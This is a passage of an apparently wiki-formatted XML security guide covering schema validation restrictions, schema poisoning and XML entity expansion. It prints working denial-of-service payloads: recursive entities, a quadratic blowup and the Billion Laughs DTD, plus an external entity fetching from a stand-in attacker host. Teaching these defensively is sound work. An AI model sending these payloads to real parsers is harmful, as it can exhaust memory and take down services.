 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
